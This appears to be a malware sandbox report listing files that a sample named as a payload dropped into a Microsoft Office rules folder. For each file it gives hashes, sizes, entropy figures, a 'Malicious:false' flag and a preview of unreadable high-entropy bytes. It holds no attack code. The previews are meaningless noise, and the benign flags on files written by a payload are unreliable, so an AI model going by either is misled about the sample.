                                                                                                                          Preview:<?xml.b.............7..`.J&.Q./.~.Z5..........,.....-~..u.o.n`.....s.-.y....z.........................`U..a'u.F.....:g.j.q_y......x....D....AQ T`..01V...K.E..n=E.....&OqOw...h...n..I..U\.M..A!}D2.zAd.>.|b...~...b.Z..v..:.2....K..........N..y>.bB.......@..6.[.y...y..!vDZ!..5wL..|0.ti'......x\..a.vDv.".#.%*Y..j...]`..m..2..if.b..E$ .#.Hfc5.Od9...+./...J.a...v.NCX......y.pw.....7.wM~B........u.v.R...W.'.KJMw....a._8F.......(......lC...F.!Z...;.-.40..@.M.9.[hJB...$cF..n..q..%..CxX9... |*O....L........7.h....!c.B..VN..gkE ...i..1....(..F~.T..k...w.a.."<Z......Dt..w....&.~!4.3.%.sN&.R .~......7W.I....s...H..c.....+.xN...o~.}^...>|.TV..;....B.~J..S.......>[.n. L....;......3.Hz.[y.Y7:.+......V....t..... .R.... D!IA...d.m......h....M....U...$CE.!.?......i..k....z...}.....{....@.x.,.......V].}..|...n.k(...v.IK...I1..)QB]%.......!...6*.s.6.$..8.5mgN...........R.(..cd......kk7./Wp..sf.....M.m=....W...&.tH..K..C..Q.I..:..3U."33.$K..^...c X.....H.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702401v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1738
                                                                                                                          Entropy (8bit):7.888194580005771
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:VoZ+moiAHE85tyI9SwX/74CYeyLORdxQMD1L4ruRD:W+mob5tyI9DvuLSQO+rq
                                                                                                                          MD5:D4D044B2A86FD0660CAD3BCDA0ECC56E
                                                                                                                          SHA1:7E30D4C749F9B513825989682C4515EC57377C28
                                                                                                                          SHA-256:387C2DBB032900990A3B5DCE28F45D3F2326F1D2A6DF4D3422C6DA6835881B6B
                                                                                                                          SHA-512:0D132417DD2DB091FA9ECD64D0EA42D770E7A34E94C67329C276ABDBAD4A3966B23B9E432E011168C316E1848C5270F248DE4327DE3ED61EB8A473D0D5B97C56
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..1......]..7(.A<U....6.a..........u..z.....h.....i$...NiV},...k.".g.U.O...(Gll....sF.|...#eDkw....|.Lie..Lgi..Q..m<...6lnl....Z6.K........t..G.[....9:.>...s&...T(....yT.I...L.!..q.t..#y.y...5....&..6..%./WvH:..`.s...k....dT.2-x>.HEG. ...F.:r...sv.{^.N":x.p...(.gP%....p...#..F.T..-..N...Q.`.G.....a...F..$n.o..........ntd...._.p.o.._J7.\......vQc..K...f'....0.+..D..#aX.>o7MI...?.O.2....(..8.U}.d....Y\<.........8.q.PJ.'F.C{.:...'..e.....E......j*ZVB.V.C..#.2..$=Z_k.'...(.!d.qI=..!.../.L._..u2.K......>R@+.....TV.a..vB+E...;......... R....y8 6.&.I.<..9D...f....\JMY.%...!..~.0...B..ns.....s.J...&.\....I....!.\..-...=...3d..m......bspS I.U........ ...w.]..T.Q"U..-^..;....C.....=..Y..H^..e.....H..........9FlVQ.. ..bF.8.~)f.....J.Cs...4.....EQB....C...A.9..{f.U.6..\?.q.:>.q........NM...v.o0* .W9.n...XP'...=....4..L&..$.Y.;....-_.S.c.....%!..WS..0..S.....S..EQ1...*J.......m..',.N..D....2qni.....z..]..#G......v...G...Dg.V+a..9.u..v0~.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702450v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1693
                                                                                                                          Entropy (8bit):7.873363368816095
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:XrqF4NIB3KZDdO3fJcvcM+m5wfYejCSP3D:Xrr/DExcvt+mKYgPz
                                                                                                                          MD5:621A2F047B44F4E1DAFC94D7C915EDC0
                                                                                                                          SHA1:88DCB9D9A822D37F3F966E55791D377CCC99CF2E
                                                                                                                          SHA-256:E9A42AA7B1EB4283C4BA0F88160EC7F618E41C6B7149A469D5238FDA68E9D7CD
                                                                                                                          SHA-512:ABA11DD8F79E90251777ED247D752BB66B5D52C6563283C0DCA8F5654B74BFE27D642D08F9EE1AC0C666B3786D5F7E9755C768A91EC1A60E7A3069CDA0DD014F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..u..n~.X.S..P....q...:j....x...B2..4.[.Z.......].[S...$D.<.(..Y...L..;...8.$0|.0.(.B..w...Bc.,.(. .....Zg..wGoL.,cX.^I*...'H....$.p[...+o..vi.q.F.g..1Of_V...~..N........]...'.A.F..5..r..3...*.<J..=....~.n.W.....Y.d.vi.$.x .[:.....!.H..}.4.Y.4...R..& .y.`..GoX.s..W.,..a.Y...Gs..?!.~K..~L.p..:.......bm='.-F...u...j}S..?..C......S.RI.y.<..7.......J#-I.I..w....`68;I...G...).-S_e....i".M....W.+J.......4# .2qSVl....9...xV.....BJl(k.I=..Ed..F.....i...dL..{{.S...5.FJr...3.S.9.Mw....O..[Vk...M..1...Y.s|J.....xI\.\Cv....1..gxt..........A..U"...ldv&r....d'9..yENI^.40DE..O@K....*ti.1[.x3Q.*..Z?...x...}d.Z.r/o.0..0...;........?>..3..#.'0.qr......h...n...sR=-.I|.....Z.[lD..8`&..3YE..a.eWK(.:..|EV.....C.X..D......l.s@......>+^S>.g...[K.U.E...i..0....[1....^.ll............jA.....2...S~..c;...'.y@).g..8...%..f.2N...`j{.........O....3....Z.+.rhU.*.Lx...s|..?...C.......Zt..R.....V1....|..^..(%W..L.y.q..iA_.[\..%.....Z........,......X.......v

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702451v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1730
                                                                                                                          Entropy (8bit):7.885059103340238
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:9++15rsrW4HRDaGdlSOxxt8c5TydIgF4Gmc+1D:Q+ARvTxMc5PEmc+N
                                                                                                                          MD5:BC42B8ECC97C979A328F79FD26A427AF
                                                                                                                          SHA1:2305F39118FDC1A82F72F2C8F1A16CEBF00E06D9
                                                                                                                          SHA-256:71E30B81093DADAC66F21F8C122116F655A97395CD3EF8A42A582353D6DEB9B9
                                                                                                                          SHA-512:ABDD632FE54670BB0A282C0E4AAC2B745C628E38AB6AAE9E2AD9E1245E0733C1C3C29CBFCE47F0ECB7164995B7B7A4DA2F3A83030DA83698313D6E6DE364E4D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml_......8...n...-.....$..*.i.55...8...4..t.3... ..!.4..+.=....Qd..~K....!...n.He0....y......T+"...".P{;.R.......ls...@k..dB....m5.....V......^v..4.xP.*Z.^........5.1*...?.%.R}.#.D.K3m`...=.....3{$.X.*.e..0.......y.0...{..]..?...4...2{6v......J.. '\.L.t..z,0..5.Ce9.,..\....L/.GEh.D....y;..6.2..)...Y.....T.hN...d..$~..V...u..-kuf....@("...Rr:.2.f.....i..L.V.(.KO0xm<g.....%O.opJ.U.(v...C2+5\f..y.[O.\e@...w.l^v.......0..q?.vL...nN......uH..'.BW..Y...d..p<.6....T.{qFp0.-.}..qW.....1.;X....k.../..f..a|./AwEn..a.....Lv.......H.l..L.]..$o.cY.TX...x,.......a.y.X!UR....!...,...Q%.}........_..Iz...1(.[Sd.>o.*a.j.Fhk.....j...j....>q....M.v.t.H.......m..".. ..G...'b.l..M.0.....M*"....o. ..x...r..D. ...2...S....v.m......M!..j...b.C......R.y.q....]c.......<.D.3:..-q.O.'&...m.7.=M.\.).g..../...p\.#\...g.Q.....^I}..w^..;3..?..B..3MO....fq..z :..T4..w......;a..tW..T.eA......y.^T......~.w[.8.j.0....u...(I.`..qh..?..m/J......x...dT...H.q....5K..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702500v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1711
                                                                                                                          Entropy (8bit):7.880362545285503
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:FmEexQAtDwJzUKxJuOcrrdg5GXn0Ol1UD:FmEehtDwVUK0Ocrra+n3A
                                                                                                                          MD5:9A1FC0C02CA1541B59D463C832E08970
                                                                                                                          SHA1:2FB86FCDF88300C395AD16428BA9DAB82E960545
                                                                                                                          SHA-256:372D844F4B96C02AF35627BAA1F6CFF638C4B1E1A537D64CFDCE9DAAD0741004
                                                                                                                          SHA-512:0D814DB14213295313A2E8C2094E1E288C1E5C36E35AA3AB1FA86A50CAF8BBE7D6CBDA07B358F296E62B800596A3E9645E0A7423FD616DB912172BACDC1F7BA4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.(.w<.c.8...@..py.\.....%:..x,...%....Lq.g>..g.z.x.....-Wl....k....p....R.]..N..)..+~\.N.~.r..37..o.,.w.|..+U.T.&Bgy\}-.X.R......m!.j:}....=V.q}..~..Q.-V.]....v...G..U.4i.,...:.<...^^.uK....r.....#.dr.'....V.+..N....+...I<8X.....Z..z?.N....2W.....5.c"./.8qR.H1.8...Y..>\.:.m..c).A.^....$.d...j:... .?#9....S..c%cx.jJy....t.# t......D..m..-B.w.}N..W0.)pO.>.+m...].zP,........6..4.sD..Bh.28O...7;.]....GpD61.-....|[...#m`..z.!..M$....io.6j..M..X.O..........OhC.5..0c.....'i.#."..}:..|.YY5.<G...a9./^...89%.k5..!...b..[R.E=..W.a......J.[.PE.#...h.%l.x.....sA.;._...[.(o&..%....F.[.'..t...*./..&>....M......v....z.....O..s.-..<C...5VD..c..{..{.(.9...<.."......1J...U) .....G.lE..&h.8I....2..XSk:....u....<.................-......J..Y....Z...|L.......{zL7.3..>>...n...'(*.^.}..A+C..~...m.7*.QR.R...4e.]..S....A...mgL&ex"....L.....Rqv.f..t..%x.v.3.U..;-Q..s...8{...'....l.....e.[bJ$.]5.P.{uw....\x.VB.c.vKG.,..%....\.>....j.Q.CJ.`..97..8...X.... f/

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702501v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1748
                                                                                                                          Entropy (8bit):7.892042494581963
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:0A3g7JeoRKUu1cTZODf1Iw5lU209KhhQ50mAgLIRD:9wdeowUuyZ8f66lNZXhmnLIZ
                                                                                                                          MD5:6C481A3EB083DD756C528BCA222E510C
                                                                                                                          SHA1:00A7C6CA3F9432B3CA97268D687DE327C7BDA264
                                                                                                                          SHA-256:1CA3668AC2DC637DFB6BEFA2DDF1CD0C9AA92AB8F74C34B480E2F5C59DF34F1F
                                                                                                                          SHA-512:EC4C45083ED028DC08D9C18C06FCEF7829C34DC7894D80EB0BEA3D99416246E1DA223B2C3F6D4C594514A707A332A61FC018DA5A4C56B93662E2E40F4FB9D412
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.6.[......9..&~DB..%..L..|..r...H=\.......*..M..S.bb.;.....-...s..z.6~2./..B:&.....k..Dq.".z./..4.[bK.a..g'E.?".e.*%.K..k!5..!y.....3l.U......>.J1U..DHxV.vN!F.x]....^..b.....Z.4.=H(d...c.H>..."..O..R.......[..(...v.v..^.n.........P..."..,.l....<kI.....>qh....^...!.c^.|.6U......-z.....<_.U.......r..r..u..)..\.V...i....*K....'M..N~{ .....-E.b.......>p.......n......DM.`5X.A..cM...2.}.s..'.r.&.........w..Z...H.e.Y..ft[!...........;s....IVX.....t.W..R..=..b.A&..[.,.....!q.RC.b_8J.WA.6V..VF.t.~.n..w.....0.t.I......\p........|&O+......Q......@<$Z...X......%gx..`...\1.. ...0...P.s......W....Z.0..l.U)cR.3...KE..3....5..<..^..k$...}..Y...m.l_.._Y........T....^.....@...v7I..A*.......B.....3..cX..;..E.Jw}....yFR..r......Lnf.n.oQP....:.<5.%>...^.H.8..Q...Ji..O...............3...p.u.p|.|.l....a!..W.f4...`..;."[..j....3.5....5.y..`~.3.p8...y}vcV.b......._` V...R.5...q.VM._;....]02.I]..w.aC.......,..|+4/.Q...N.......Z.).r..;........[s..I

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702550v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1711
                                                                                                                          Entropy (8bit):7.869664338304683
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:iqde3vRbpK5RmPjkWhNPIDuEu7nDkNGsbNeUQpD:Be3vWOjdvwDuvkNGsbLQB
                                                                                                                          MD5:70268E4B73671805701B7D71920FE002
                                                                                                                          SHA1:23337106ACCCE806A03C67EB26DEBDA06DBB9657
                                                                                                                          SHA-256:1D7EF5001DED7DF66D20E4EF04C239B6BCB475064B54216007A2CEBA9EF9D02E
                                                                                                                          SHA-512:895CE2CF201D1143B4FC21BA0BFEB7E9C3C7E61FD667116AB3D913D826BCADD866EDA720D40AD2C54D16348A5B3D9BA639306637685FA3080A3F85263DC365C5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml......i.9.&.Ws!....6.!.(l..BT>..u...c.g..Tr.....e..%G....y........o8..!.N.`4.#lV....J[.]+....5V{..6..o_..M.u(.....:..%S....h0.."y....#..)R.......|.~..'"8...m.Rn.c-..3....Q ..[.r..T-..^..Z.m..&..m.%.8....erJ..Pqt.T..!.e....L...3hY....4?.j]@C/.Ol..fLo.Q.[.Zy..W..)C......c.....U.?."6...2|MEO}...&.....Ct..:m....rH3.....VI........I.VAB?.../.[.t.X..p;N......i&y?u.?.DD...pG.f......-.G....ls..p...4d....<.x..&%....w...1H.n.......].3.B..O.3L..S3.......tS5.uF.yY..T....pLL.w...EE..AP.y...c.l.v...M.....i....AH..7.....g...){....9y.s..-.{.-g].&.qS.......z....^.*PH$.M..Z....M..b.ZI..U<..>\.C.sw..JY.e...>;.:....:..Y..(a<k;]$.J....U7..l..!..:.{..wC-4....uJ.C.5D...Z.......F....$Xl.J..{.....>.......[..$]..8Y..S.x/.{.*kl%..n...R....Q.<F......6~p.R:W..re.v...l.OG...=hu.^.......(.\.gR..5.pH..\.I........h.?..&..B....&k..^.x....s...O.ti7._u\gn5.......&......Z&d.&k...c....;I.....C.#....JF...2..UY......X.O...f.H..s.9..kD...|....._T...w=. ...||._.[6a..7....._

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702551v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1748
                                                                                                                          Entropy (8bit):7.87682292737376
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ls8xEN6ECbIbUOu+qPQITY24o/XTJqJxcunwbuE1K1T9QJEG62z3BAsYCiTbD:K8tIbjujY2zXTsJxZnwSEkG6E3BUHD
                                                                                                                          MD5:CE444A9A9566D07F5EA1F09210FAEACC
                                                                                                                          SHA1:9D895996F79D432DDDFDADFA16AA234FD9039F72
                                                                                                                          SHA-256:397250DFB1208506C4B1B2034E18954AA19FC71E9239E1543C92C509D1720397
                                                                                                                          SHA-512:C41098FD55C05A630431DF29C532725844A75750FCED7FBF4F29C6F8305555902F6378AB41FBB7ABE0D51F50AEAB403B7C0B81F8B95B1E24260F7EF0054E0077
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..|..c...oo4.!_4...Y.. >.3@QVK.G.#M]`6.T.]l..X.......[.8...>.R[.o..hp].\..(:.P: !......(...2.....(o.|.9.P.m....nZE...#.l.......VJS..D.....X..=.j...h....v......_J.q......=.+b9....b....>W..vA.EP...x$!.6.v...?\..@[........j*Y..+....Q..PwH.=.Ic...T-.....@@..-.*z..Bp..eYsT...ZE.Z..J.w'..D............y..4x.......N..s>...P~.....Ez..V....F.d..k.....f..J./I.E.Wtx...$i.....a:.!m........'.+.f...K......(P...S.k......^.......;....q.....5.w.....c.t.."Zp.j.....kv....c......QA.........&f!T.../....P.5Y........&.^.....h.P,G...JG.{..B.F.,.i...U.9[p...&e...K.!+.[.IYV.....4un6... ..v...=~X,.R.z.....MD.S..~..uHc....a.W..e..1.....~!.....1k....5.[..}&@.....>...3.....-.b.Mx..........g"]...A7".......gP-.r...I%..q..,..[."=.E.....2..r.....X...m...G..|\..x..(...w<&..E..HB..X......T...%...._..w........g.p30.+..16PR.|g.>...S..(-S4[(?..a.&.v.\vp.z.V...hm..9..|...=."..W:.."...{q/.3,J{C...H.!.......s...=...N.\..bG...'c.....^..du.A:..6r.;.}..<So

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702600v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1705
                                                                                                                          Entropy (8bit):7.895671858135766
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:ju1E33euvhrfQ06avOj4ZdPyVZXBTyUbgnD:juK3uuvtfQ0G8CRLu
                                                                                                                          MD5:225505C194146B097F8C3090BA194247
                                                                                                                          SHA1:0F9CE9B2CFDE3A542C2FF3BDC16C2AC39FEEC7DC
                                                                                                                          SHA-256:D8AD87840A85D8D6BE2A6F435341DB631C539128C8C03FDF284DFEA44453BD15
                                                                                                                          SHA-512:0377E31BCB8D9D433E3B25D45CFC372FDF3DF31EABCF4F553E18C0F1D7B2966349793D8B12A88CB90C9CBAE9CA1AF2957C6E95E584415F8CCA84BEA417374C27
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..U]d.#.D.3.#....2.... 0Wm......v...7.{...K..6.+..p..V.<.[.Av....]......>..BV...8..d.*Mr.<.:@f...C...@(.....7*0....d....F.s=m..|6..Q........6.$...:_...5~..B.'...}A.?...s.-.q.z...s%@.._.hL...;89.."..?.'*.WP/..M...UfN.>S..Ay...&.p....A....y..EY.w"...s,..`x/U.B$.<y.....C.e.9.......+7....&.. ..C.nB....5%.n.eJ....*{..UTc.V.z]......-.V...<ES.".a.K..../4.L....C.|.h.!~.c.s.Y..Y-'\.u.4c..nH.:AzoRQe.....,y.U..X.)jE.4...l...8;.q........;....p.e...O....J8...3"XJ!...xl.:.H.p.O...,i.[......D..=....J..<....KaN..j..`.(e..'..EZ.1.Rl.......D..%&..(.~.....R........dQ.....+....e..n..^+.......h....*..........\.9.........S.[.'......*...Fe~....qJ4wz.M.V.>3.(..X...d.b`.*...].|.J.KB.?......\6...[.6...gbE.{L...y%..x.).-.8......l...5Y..._.....*...h0.g....W......^.)....q....=I...X...@0..D..j!.i [N..p^.8.w...C..B.k..U.B.O.d......... ..f.7...........|..\......!.j{...J..G.s..&..e..C...'. .a..m....J(..i.B....Xy......R$...).A.U.)......;N......P$T.rR\.K t<c

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702601v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1742
                                                                                                                          Entropy (8bit):7.877517194815627
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:t16WKo8RRGxGLGRzcvCmOJMhAe/qxxljoD:z3x+G+CmfhAe/qxxF0
                                                                                                                          MD5:3B3D2B3B05E3076433B28C3375621514
                                                                                                                          SHA1:E26A4FC7943B6B578F80B9EE038F35A635C43D88
                                                                                                                          SHA-256:FD3E73626ADC7644897CBE8BEE8CC4AE55787A1C8D663B25BA8E9BD1512A7243
                                                                                                                          SHA-512:B1E0A089992F7B6D85308CA25D230D23C00ECD97D7DFF3603FAF212407E108585273A493CB6D7C23C8CD524D6F8796E5750EC4EE27AC3E9F171439A2942F1E5C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.g.....s....1D...O..`.;rm.p.......f*+.*.,.Y..{...=..w.^....v(......JK...J..n.68...-. .S.N..L..C.z.q.j..".x._...@.Ff{O.?.....8.8....{R..........w.T.n..kS..Sc..M.3...q.a:...:......lz...G|k.C...3..|3..K..;.......~......Hs..ot...1..iH...fU..z....b....}wX..S.._.e..j...?,..[v....xK.....O`..?.....2p1.z.hr<'...^...%...x.J.:XHd_...C..$..$......Z.@.Gj..J.Xw)p.Z<.r.X1'./,.........|..U".........i.].Nt.d......'..DSJ.....T....M.:o....S.......E...v.+....(.....i...U..:Z#....p/7...I{..N.....,.2........K.5P....8$-...WM..."L..kw&..pd..7.. p.....F.....?...0".....!fP.@..n.<...m.h.......|..bMM7l.aH........8.S^..wp.......H.X.o..g.../.r.}.T...W..`+..c...._..H.;Jc.k..!KRC^mwA[./eW...3....Q.._...eP..\..7..=......j3<:........1.1.M5..)Db.lJ..]....x._y.@,...U...I.sQ*V...k......Z.....,...P`.=.!PE.c.j{?6\nS.g..j4@>.(.S..iN...@...a.Z.n..PJ..v...h5.fq_U]E..p....2.85Lf.F;... ..?l..b...Q.?...@..Q....E..'.......|..U..4..c.$.dC...!]..C.Rw..&.c..G5....N..U.:0...(.9....%. ..m.F..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702650v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1691
                                                                                                                          Entropy (8bit):7.891654976184087
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:wXGFarJT92qkOY8WNtAIc5B3Dy8pdgBnIl7lyTGD:wXGFeLOyIoB3DJcOBsC
                                                                                                                          MD5:34106D8358F6DB6492114E0EA17EC453
                                                                                                                          SHA1:F679ECBFCFB7E7BC31463C137E3086F496EC5EF5
                                                                                                                          SHA-256:501667B4C7EEB1B01E18A2B71560545980FAEF8E7459D098E790294E2B444DC4
                                                                                                                          SHA-512:9109DEEA2D5FDBEBAB6737636B6A387CB335DAEF61E9843BFC918EBD4764CEEDAFBD748654BFC0FF2EB8E9707DDC7B2BD9D7DA4A4FB2EB990C05FF49C60FF333
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....G......O.z.../.].2.a.o../.|X...4..0.?.."...#.wM..Up...y6J.....gR..z.S9.....D...G......D[....S.x....OH.....*|....M&.....iP.O..e.<r.\F..?_U0.D..&.4....)<x.t.u."..A.D..f........X:.....?[.NSC.._KO..y..G.W.v.......m.*Dj.f...o. r-....^I......*..q..F...!.j9..">`.h.....)......-\u=Kxm.T....|c..Non....pN...m..i.......=.a.d.v.%.&X..P.4A-...............B.K.J.#..t.l.......{.:]".........96...<`m....+.........K....=.%T...U.45.u..Rm.D....(.=....-..C.k4..H.....*...Q..4.:8....v.=.."!.L.x...x.%.-|....O....n..s~...t.p.../x..~g{aI..C.....T..sn9..h)?..d^.....&2.....^..HP0.H*..l.F.ev.(`.~..........[.].0....\....%..K.u..r...o.T....}*+..<..G./../).o..+......!{.sV(b9.=.R.a.....P...OV..J...x..0'8...5.rbI.A.....3.,......e...[t..0a.Su..].n.#....k4?......i.....%,.D.&8.....P.t.X!y.e9..o#..g..'..j.Km.....5.0..hhK........z...r.....1.B..].i-...x...... ..>.G.....m``...F>.E.o_#.>.H.a....B.....,.......L..h'........#V.........j...tMT.Q._O..?.T...p......rEfD.Pa.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702651v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1728
                                                                                                                          Entropy (8bit):7.886692002038429
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:mxSJPjG/CtLj3cdYyxzBTIP0wi/JiX23YaHjD:aM7GgrAzdHwcJi0v
                                                                                                                          MD5:6F9A999C5B1D873946F709BA8D85D449
                                                                                                                          SHA1:9AA763575871AF4CDC0519A886221D18E1A7B315
                                                                                                                          SHA-256:045769A90BDB523493DB9E739311D77E7DCA53E95F1D35B57AB1955BA598B91A
                                                                                                                          SHA-512:6C5CEF63031E0E3573B49F1D8E9942EE03A80A20486CAA0B811A3FFC51A6AD179BBE6F29719ABD854D1DC5D5BC888FC04859B92C4AE638481F24182C50C9447C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlk,7...n....+.,.........#'|.+%.J.....p...V...W..../wD.h[.....y........((:`..2.......+"|..k.d.G:...0.l.O.a......=........byD5....@>W.]..0J....-.-..].^...o..j.......R....Gj.!...Fh.Z`...X.X?.)z..M..|.Gw......uh....Ce.Rd.q.'...@i.......Au=K...1r.^h..(...........j.#_W.~.6X..St..D.pp.$7..../;l...<@IA*.!..+s].W.(_-.q..u!....w..w.Ch0].......|.1OS.;g.....p:h............T.....MC.Ii.4.....J..0V>S_k.m.$%...,.BBO...0a.].. n.o.bw.=....NC..)..A..+.!.o.zKeki..V..hp.....G.....E............/....3.R.....v)...G'm.H..}X...X.......-&.C%..]D.9..n.gY..d..\...F.l..X.o......y.....Q5...A.Ge5n_.$.h...K..j~&K...;......;.....6.;Vvh..v>.E7..;........d$..MH..J....+z.. s........jI..2..w.).`.?s..P`.|...y.I(.;...I.Oy.......y....r....$.2A....9I.&.(dvx...B...-..3...k....a.....;...9lG..t....r.D.-i....}.W..1.8n.D..>......j'&kUu.... U....r...]3..,....NI.D.+,8.;K^x.4V.".]v.1......}..e.]..Y.Kr_....g.f.l...kp."..v..+F.".Z.......C.+..&k..G3B....>.<N..]&o.2eu.pY....@..?.^.T..|.p5

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702700v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1700
                                                                                                                          Entropy (8bit):7.8930509208507
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:RwiO83frFCV1nAFljSe7MvnrqnHsJMEYUI6zD:Si5CV1nAjepGnhEYAf
                                                                                                                          MD5:4C10FCD81AF4F3F6F8484465D029179E
                                                                                                                          SHA1:159956478488FDBCC867C1F4EBE1D53237DC2DB8
                                                                                                                          SHA-256:690A4D0A1FC76F1171AF269736301C2B1BFB26B2F4824F5C3C7C9F48133BAE2B
                                                                                                                          SHA-512:83415D89D4C5CF9C4CEF2C663E86C4CE6798B11CC91524941D25827CDC7E5C34977CDF2FF628896EF93F558CB327664C5F070E7E2E3322004602C1B5237FE6A2
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml0..2.8E..Pi.-:..`.Z...A.`.z.f|....wX(^4.......da..O5f.;......*.....:*..RIA.>.....a.L..|C.I>.XN[..L..r....+q.....E..(.....s..hX....C..2..i.e26....nQs...R&.R..4.\..H.P-c./..{.#......W....".kZ....."..^..0gu-E.p..U.A...p.3H.......\.`t....G.J....g...*.B.8...;.+7..TF..... ..=2r...eLH.v.b*F..y...x.+u.....Pt.....u.@a....wxU...EO....G.2gPkT.....=.^6B.....1..~..f....}}................b.9... <Kq......F.........c.Ci..yW........@.?%....z.F&.....4..U6..........e....s....7........`..$R.aV..e.."..[d/...M;B.P..P.</..!2i...s...z....D....%.....".b.X.....".D...RM.kU%<..@.). }.'bw..........o..E%..J...C8...~..4:...4..............*.\.9YT.*W.g.x<;............W.<.&B.U.d<...........9G.....I(..82....../.....G..#......PV.(.).......bi$t.5..f...v..w....f...?.-W.H.8#.....[....w..p..B......p....8..[.Kp6+....V:..4x.z.F.h.uvO..\G......w..u.......Fgc.....6 m.....pO...k.V]... !6u....}.......v.5....i.xoh..q...?.z....^...@.o.3...LKZY=9.<Aw...|......Dy..A1.A.Pa..,.K&...

